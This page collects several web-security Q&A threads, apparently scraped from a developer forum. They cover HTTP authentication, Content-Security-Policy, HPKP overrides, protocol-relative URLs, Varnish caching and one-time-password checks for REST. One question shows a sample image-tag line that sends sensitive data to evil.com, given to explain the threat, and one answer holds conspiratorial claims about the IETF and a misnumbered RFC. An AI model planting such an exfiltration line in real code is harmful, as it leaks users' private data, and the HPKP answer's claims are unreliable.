My site uses HTTP authentication and I've learned it isn't very secure and it causes a lot of problems for many browsers, and not all browsers may support it, so I want to use an alternative that is secure and more widely supported; what are some alternatives?
Is it possible to lock all directories using an HTML login page?
My site uses HTTP authentication and I've learned it isn't very secure
That's false... unless you're referring to something like basic auth over an insecure channel. In that case, anything over the insecure channel has potential issues. (Even if you did some client-side encryption hackery, you still have the problem that the remote host is not verified without the TLS or SSL layer.)
Basic auth is fine in some cases, and not for others. It depends on what you're trying to do.
it causes a lot of problems for many browsers, and not all browsers may support it
Completely false. I've never seen a browser that didn't support basic auth and digest auth.
what are some alternatives?
This isn't possible to answer without a better understanding of your requirements. Two-factor auth with a DNA sample and a brainwave scan might be more secure but chances are that's not what you're looking for. Besides, you can't forget about the rest of your system and you've told us nothing about that.
Is it possible to lock all directories using an HTML login page?
Yes. How you do this depends on what you're running server-side, but yes it's completely possible and often done.
Related
The background scenario is that I want to give my users a javascript which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to internet.
Initially, I thought I'll just distribute it as an .html file with embeded <script>, and that they'll just run this .html file in browser over file:/// protocol, which gives some nice same-origin policy defaults.
But, this won't really offer much security to my users: a javascript could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag which would send a GET request to evil.com, despite evil.com being a different origin, because by design embeding of images from different origins is allowed.
Is there some practical way in which I could distribute my javascript and/or for the end user to run such script, so they could be reasonably sure it can't send the data over the internet?
(unpluging the machine from the internet, installing VM, or manipulating firewall settings, are not practical)
(reasonably sure=assumming that the software such us browser they use follows the spec and wasn't hacked)?
Please take a look at Content-Security-Policy subject.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your html by <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should disallow browser to make requests to foreign resources.
The alternative attempt could be developing your project in the form of a browser extension, where you can set up content security policy quite precisely, including defines of inline scripting, executing string-to-js methods, frames and fonts origin, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ )
As a bonus you (and your users) get a free of charge code review from the security departments of the browsers vendors.
Setting up browser proxy in settings to localhost:DUMMY_PORT looks like safe solution for this case.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So, this reduces the trust of the user to the trust in deno (and to chocolatey if they want to use choco install deno to install deno).
I added HPKP header to my site, but it is not honored by Chrome or Safari. I tested it manually by setting a proxy and by going to chrome://net-internals/#hsts and looking for my domain - which did not found. The HPKP seems correct, and I also tested it using HPKP toolset so I know it is valid.
I am thinking I might be doing something weird with my flow. I have a web app, which is served over myapp.example.com. On login, the app redirects the user to authserver.example.com/begin to initiate OpenID Connect Authorization Code flow. HPKP header is returned only from authserver.example.com/begin, and I think this might be the issue. I have include-subdomain in the HPKP header so I think this is not the issue.
This is the HPKP header (line breaks added for readability):
public-key-pins:max-age=864000;includeSubDomains; \
pin-sha256="bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE="; \
pin-sha256="cJjqBxF88mhfexjIArmQxvZFqWQa45p40n05C6X/rNI="; \
report-uri="https://reporturl.example"
Thanks!
I added HPKP header to my site, but it is not honored by Chrome or Safari... I tested it manually by setting a proxy...
RFC 7469, Public Key Pinning Extension for HTTP, kind of sneaks that past you. The IETF published it with overrides, so an attacker can break a known good pinset. Its mentioned once in the standard by name "override" but the details are not provided. The IETF also failed to publish a discussion in a security considerations section.
More to the point, the proxy you set engaged the override. It does not matter if its the wrong proxy, a proxy certificate installed by an mobile device OEM, or a proxy controlled by an attacker who tricked a user to install it. The web security model and the standard allow it. They embrace interception and consider it a valid use case.
Something else they did was make the reporting of the broken pinset a Must Not or Should Not. It means the user agent is complicit in the coverup, too. That's not discussed in a security considerations section, either. They really don't want folks to know their supposed secure connection is being intercepted.
Your best bet to avoid it is move outside the web security model. Don't use browser based apps when security is a concern. Use a hybrid app and perform the pinning yourself. Your hybrid app can host a WebView Control or View, but still get access to the channel to verify parameters. Also see OWASP's Certificate and Public Key Pinning.
Also see Comments on draft-ietf-websec-key-pinning on the IETF mailing list. One of the suggestions in the comment was change the title to "Public Key Pinning Extension for HTTP with Overrides" to highlight the feature. Not surprisingly, that's not something they want. They are trying to do it surreptitiously without user knowledge.
Here's the relevant text from RFC 6479:
2.7. Interactions with Preloaded Pin Lists
UAs MAY choose to implement additional sources of pinning
information, such as through built-in lists of pinning information.
Such UAs should allow users to override such additional sources,
including disabling them from consideration.
The effective policy for a Known Pinned Host that has both built-in
Pins and Pins from previously observed PKP header response fields is
implementation-defined.
Locally installed CAs (like those used for proxies like you say are running) override any HPKP checks.
This is necessary so as not to completely break the internet given the prevalence of them: anti-virus software and proxies used in large corporations basically MITM https traffic through a locally issued certificate as otherwise they could not read the traffic.
Some argue that locally installing a CA requires access to your machine, and at that point it's game over anyway, but to me this still massively reduces the protection of HPKP and that, coupled with the high risks of using HPKP, means I am really not a fan of it.
It's been an oft-discussed question on StackOverflow what this means:
<script src="//cdn.example.com/somewhere/something.js"></script>
This gives the advantage that if you're accessing it over HTTPS, you get HTTPS automatically, instead of that scary "Insecure elements on this page" warning.
But why use protocol-relative URLs at all? Why not simply use HTTPS always in CDN URLs? After all, an HTTP page has no reason to complain if you decide to load some parts of it over HTTPS.
(This is more specifically for CDNs; almost all CDNs have HTTPS capability. Whereas, your own server may not necessarily have HTTPS.)
As of December 2014, Paul Irish's blog on protocol-relative URLs says:
2014.12.17: Now that SSL is encouraged for everyone and doesn’t have performance concerns, this technique is now an anti-pattern. If the asset you need is available on SSL, then always use the https:// asset.
Unless you have specific performance concerns (such as the slow mobile network mentioned in Zakjan's answer) you should use https:// to protect your users.
Because of performance. Establishing of HTTPS connection takes much longer time than HTTP, TLS handshake adds latency delay up to 2 RTTs. You can notice it on mobile networks. So it is better not to use HTTPS asset URLs, if you don't need it.
There are a number of potential reasons, though they're all not particularly crucial:
How about the next time every business with an agenda pushes a new protocol? Are we going to have to swap out thousands of strings again then? No thanks.
HTTPS is slower than HTTP of same version
If any of the notes listed at caniuse.com for HTTP/2 are a problem
Conceptually, if the server enforces the protocol, there is no reason to be specific about it in the first place. Agnosticism is what it is. It's covering all your bases.
One thing to note, if you are using CSP's upgrade-insecure-requests, you can safely use protocol-agnostic URLs (//example.com).
Protocol-relative URLs sometimes break JS codes that try to detect location.protocol. They are also not understood by extremely old browsers. If you are developing web services that requires maximum backward-compatibility (i.e. serving crucial emergency information that can be received/sent on slow connections and/or old devices) do not use PRURLs.
I use Varnish to cache content in different web applications (most of them based on Django and Drupal). Those familiar with Varnish will know that it doesn't cache pages with cookies, unless you do some VCL magic, as explained in the documentation. In most cases this means that your authenticated users won't benefit from Varnish caching (please correct me if I'm wrong about this and there's a way of caching parts of a page for authenticated users with Varnish).
So, I want to write this web application using HTML5 Web Storage to allow visitors to save some data locally and I was wondering if Varnish would work with it. I understand that Web Storage doesn't use the HTTP headers as cookies do, hence Varnish caching should work.
Can anybody who has played with Varnish and HTML5 Web Storage confirm this?
(please correct me if I'm wrong about this and there's a way of caching parts of a page for authenticated users with Varnish).
You could use ESI for that, but it requires a few changes to the application to support ESI as well.
So, I want to write this web application using HTML5 Web Storage to allow visitors to save some data locally and I was wondering if Varnish would work with it. I understand that Web Storage doesn't use the HTTP headers as cookies do, hence Varnish caching should work.
Since that cache is entirely client-side, it's indeed unrelated to Varnish, your server does not even know if there's a client-side cache being used or not, since that's application logic.
It will work nicely if you use javascript to replace content use web storage.
You have to be careful though, otherwise user will see a "flicker" or JS replacing content.
I was searching for a solution of the following problem, so far without success: I'm planning a RESTful web service, where certain actions (e.g. DELETE) should require a special authentication.
The idea is, that users have a normal username/password login (session based or Basic Auth, doesn't really matter here) using which they can access the service. Some actions require an additional authentication in form of a PIN code or maybe even a one-time password. Including the extra piece of authentication into the login process is not possible (and would miss the point of the whole exercise).
I thought about special headers (something like X-OTP-Authetication) but that would make it impossible to access the service via a standard HTML page (no means to include a custom header into a link).
Another option was HTTP query parameters, but that seems to be discouraged, especially for DELETE.
Any ideas how to tackle this problem?
From REST Web Service Security with jQuery Front-End
If you haven't already, I'd recommend some reading on OAuth 1.0 and 2.0. They are both used by some of the bigger API, such as Facebook, Netflix, Twitter, and more. 2.0 is still in draft, but that hasn't stopped anyone from implementing it and using it as it is more simple for a client to use. It sounds like you want something more complicated and more secure, so you might want to focus on 1.0.
I always found Netflix's Authentication Overview to be a good explanation for clients.